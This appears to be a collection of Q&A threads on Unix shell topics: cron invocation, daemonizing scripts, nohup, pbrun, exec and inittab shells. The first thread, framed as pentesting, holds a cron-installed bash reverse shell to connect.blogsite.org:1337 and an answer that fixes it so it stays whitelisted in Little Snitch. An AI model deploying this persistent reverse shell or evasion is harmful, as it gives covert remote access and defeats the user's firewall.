OS X: cron job invokes bash but process run is 'sh'

I'm working on a pentesting project in which I want to open a reverse shell. I have a device that can trigger Little Snitch and then set it to allow outbound connections for certain processes. It does this by issuing a reverse shell command and, when the LS window pops up, acts as a keyboard to tell LS to always allow this type of connection. I can successfully do this for Bash, Perl, Python and Curl. The device also installs a cron job which contains a one-line reverse shell using bash.
But here's the problem...
The first time the cron job runs, Little Snitch still gets triggered because it has seen an outbound connection from 'sh' - not 'bash'. Yet the command definitely calls bash. The cron job is:
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &
Subsequent connections are either from bash or sh - I haven't yet detected a pattern.
I've tried triggering LS in the original setup by using /bin/sh, but at that stage it still gets interpreted (ie, is seen by LS) as bash, not sh (since, in OS X, they are essentially the same thing, with slightly different behaviours depending on how they're invoked).
Any thoughts about how I can stop OS X using sh rather than bash in the cron job? Or, alternatively, how I can invoke sh rather than bash? (Like I said, /bin/sh doesn't do it!)

The command string is /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &. Cron needs to invoke this command. It doesn't parse the command string itself to learn that the first "word" is /bin/bash and then execute /bin/bash, passing it the rest of the arguments. (Among other things, not all parts of the command are arguments.)
Instead, it invokes /bin/sh with a first argument of -c and the second argument being your command string. That's just the generic way to run a command string.
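So what cron actually runs, every five minutes, is in effect:
/bin/sh -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'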
Then, /bin/sh interprets the command string. Part of the command is redirection. This is not done by the program that the command launches. It is done by the shell which will launch that program. That is, the instance of /bin/sh has to set up the file descriptors for the child process it's going to launch prior to launching that child process.
So, /bin/sh opens /dev/tcp/connect.blogsite.org/1337. It then passes the file descriptor to the child process it launches as descriptors 0 and 1. (It could do this using fork() and dup2() before execve() or it could do it all using posix_spawn() with appropriate file actions.)
The ultimate /bin/bash process doesn't open its own input or output. It just inherits them and, presumably, goes on to use them.
You could fix this by using yet another level of indirection in your command string. Basically, invoke /bin/bash with -c and its own command string. Like so:
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'
So, the initial instance of /bin/sh won't open the file. It will simply spawn an instance of /bin/bash with arguments -c and the command string. That first instance of /bin/bash will interpret the command string, open the file in order to carry out the redirection directives, and then spawn a second instance of /bin/bash which will inherit those file descriptors.
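If you want to confirm which process ends up holding the socket, lsof can show you while the job runs (lsof ships with macOS; -i matches the port on either end of the connection):
sudo lsof -nP -i TCP:1337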

Related

How to daemonise a shell-script in FreeBSD (and macOS)

The way I normally start a long-running shell script is
% (nohup ./script.sh </dev/null >script.log 2>&1 & )
The redirections detach stdin and reopen stdout and stderr; the nohup stops SIGHUP reaching the process when the owning shell exits (I realise that the 2>&1 is somewhat redundant, since nohup does something like this anyway); and the backgrounding within the subshell is the double-fork which means that the ./script.sh process's parent has exited while it's still running, so it acquires the init process as its parent.
That doesn't completely work, however, because when I exit the shell from which I've invoked this (typically, of course, I'm doing this on a remote machine), it doesn't exit cleanly. I can do ^C to exit, and this is OK – the process does carry on in the background as intended. However I can't work out what is/isn't happening to require the ^C, and that's annoying me.
The actions above seem to tick most of the boxes in the unix FAQ (question 1.7), except that I'm not doing anything to detach this process from a controlling terminal, or to make it a session leader. The setsid(2) call exists on FreeBSD, but not the setsid command; nor, as far as I can see, is there an obvious substitute for that command. The same is true on macOS, of course.
So, the questions are:
Is there a differently-named caller of setsid on this platform, that I'm missing?
What, precisely, is happening when I exit the calling shell, that I'm killing with the ^C? Is there any way this could bite me?
Related questions (eg 1, 2) either answer a slightly different question, or assume the presence of the setsid command.
(This question has annoyed me for years, but because what I do here doesn't actually not work, I've never before got around to investigating, getting stumped, and asking about it).
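One workaround for the missing setsid command: since the setsid(2) call exists on both platforms, you can make it from a perl one-liner before exec'ing the script (a sketch; macOS ships perl by default, on FreeBSD it's a package):
perl -e 'use POSIX qw(setsid); fork() && exit; setsid(); exec @ARGV' -- ./script.sh
The fork is needed because setsid(2) fails in a process that is already a process group leader, which a foreground job started from an interactive shell is.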
In FreeBSD, out of the box you could use daemon(8) to run a program detached from the controlling terminal. The -r option could be useful:
-r Supervise and restart the program after a one-second delay if it
has been terminated.
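A minimal invocation might look like this (the script path is a placeholder; -f additionally redirects stdin, stdout and stderr to /dev/null):
daemon -f -r /path/to/script.sh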
You could also try a supervisor; for example, immortal is available for both platforms:
pkg install immortal # FreeBSD
brew install immortal # macOS
To daemonize your script and log (stdout/stderr) you could use:
immortal /path/to/your/script.sh -l /tmp/script.log
Or for more options, you could create a my-service.yml for example:
cmd: /path/to/script
cwd: /your/path
env:
    DEBUG: 1
    ENVIRONMENT: production
log:
    file: /tmp/app.log
stderr:
    file: /tmp/app-error.log
And then run it with immortal -c my-service.yml
More examples can be found here: https://immortal.run/post/examples
If you just want to use nohup and save stdout & stderr into a file, you could add this to your script:
#!/bin/sh
# send stderr to wherever stdout is going, so both streams land in one file
exec 2>&1
...
There's more about exec 2>&1 in this answer: https://stackoverflow.com/a/13088401/1135424
Then simply call nohup /your/script.sh & and check the file nohup.out; from the man page:
FILES
     nohup.out          The output file of the nohup execution if
                        standard output is a terminal and if the
                        current directory is writable.
     $HOME/nohup.out    The output file of the nohup execution if
                        standard output is a terminal and if the
                        current directory is not writable.

Running a script in PowerBroker

I'm trying to script my commands that are run inside the pbrun shell. I've tried executing through a normal script, but that doesn't work because, to my understanding, pbrun is executed in its own subshell, making it hard, if not impossible, to pass commands to.
The only solution I can think of that might work is an input/output text processor that listens to the terminal and responds accordingly.
I was able to send commands to the standard input of pbrun:
echo 'echo $HOSTNAME' | pbrun bash
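For a longer sequence of commands, a here-document works the same way (a sketch, assuming pbrun passes stdin through to the bash it runs, as the one-liner above suggests; quoting the EOF delimiter stops the local shell from expanding $HOSTNAME):
pbrun bash <<'EOF'
echo $HOSTNAME
whoami
EOF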

How to run shell script on VM indefinitely?

I have a VM that I want running indefinitely. The server is always running but I want the script to keep running after I log out. How would I go about doing so? Creating a cron job?
In general the following steps are sufficient to convince most Unix shells that the process you're launching should not depend on the continued existence of the shell:
run the command under nohup
run the command in the background
redirect all file descriptors that normally point to the terminal to other locations
So, if you want to run command-name, you should do it like so:
nohup command-name >/dev/null 2>/dev/null </dev/null &
This tells the process that will execute command-name to send all stdout and stderr to nowhere (instead of to your terminal) and also to read stdin from nowhere (instead of from your terminal). Of course if you actually have locations to write to/read from, you can certainly use those instead -- anything except the terminal is fine:
nohup command-name >outputFile 2>errorFile <inputFile &
See also the answer in Petur's comment, which discusses this issue a fair bit.
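If the command is already running under bash, the disown builtin offers a similar escape after the fact (bash-specific; -h keeps the job in the job table but marks it so SIGHUP is not delivered to it):
command-name &
disown -h %+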

Putty closes on executing bash script

I am writing my first ever bash script, so excuse the noobie-ness.
It's called hello.bash, and this is what it contains:
#!/bin/bash
echo Hello World
I did
chmod 700 hello.bash
to give myself permissions to execute.
Now, when I type
exec hello.bash
My putty terminal instantly shuts down. What am I doing wrong?
From the man page for exec:
If command is supplied, it replaces the shell without creating a new process. If no command is specified, redirections may be used to affect the current shell environment.
So your script runs in place of your login shell, and when the script exits there is no shell left to return to, so your PuTTY session closes. Just execute it normally instead:
./hello.bash
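Or run it through the interpreter explicitly, which also avoids the exec:
bash hello.bash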

How to start a linux shell as from /etc/inittab

We used to have two entries in our /etc/inittab:
::sysinit:/etc/init.d/rcS
ttyS0::respawn:-/bin/sh
rcS is a shell script which normally starts our application, but in a special case we called "return" to terminate it, which apparently let /bin/sh take over the tty: we got a shell prompt where we could do some maintenance.
Now the inittab looks like this:
::once:/etc/init.d/rcS
We now start the shell by executing "/bin/bash -i" in the rcS script, as (due to memory constraints) we don't want to always run a second shell that is normally never used.
But the created bash doesn't feature job control, which is very limiting.
So my question is: can I create a shell (and maybe terminate the rcS script) the same way the init process did in our previous solution, so that I again get a shell with job control?
This depends on exactly what OS you are running. Here is an example which works on RHEL/CentOS.
6:2345:respawn:/sbin/mingetty --autologin root tty6
Here is what someone else did for a similar trick.
openvt -f -c 12 -w -- sh -c "unicode_start; echo -e '$NORPT'; exec $LOGINSH" >/dev/tty1
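If you'd rather keep spawning the shell from rcS, the underlying requirement for job control is that the shell be a session leader with a controlling terminal. A sketch (untested; assumes a setsid command from util-linux or busybox is available, and that the console is the serial port ttyS0 as in the original inittab):
setsid sh -c 'exec /bin/bash -i </dev/ttyS0 >/dev/ttyS0 2>&1'
Opening the tty after setsid makes it the new session's controlling terminal, which is what bash needs for job control.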
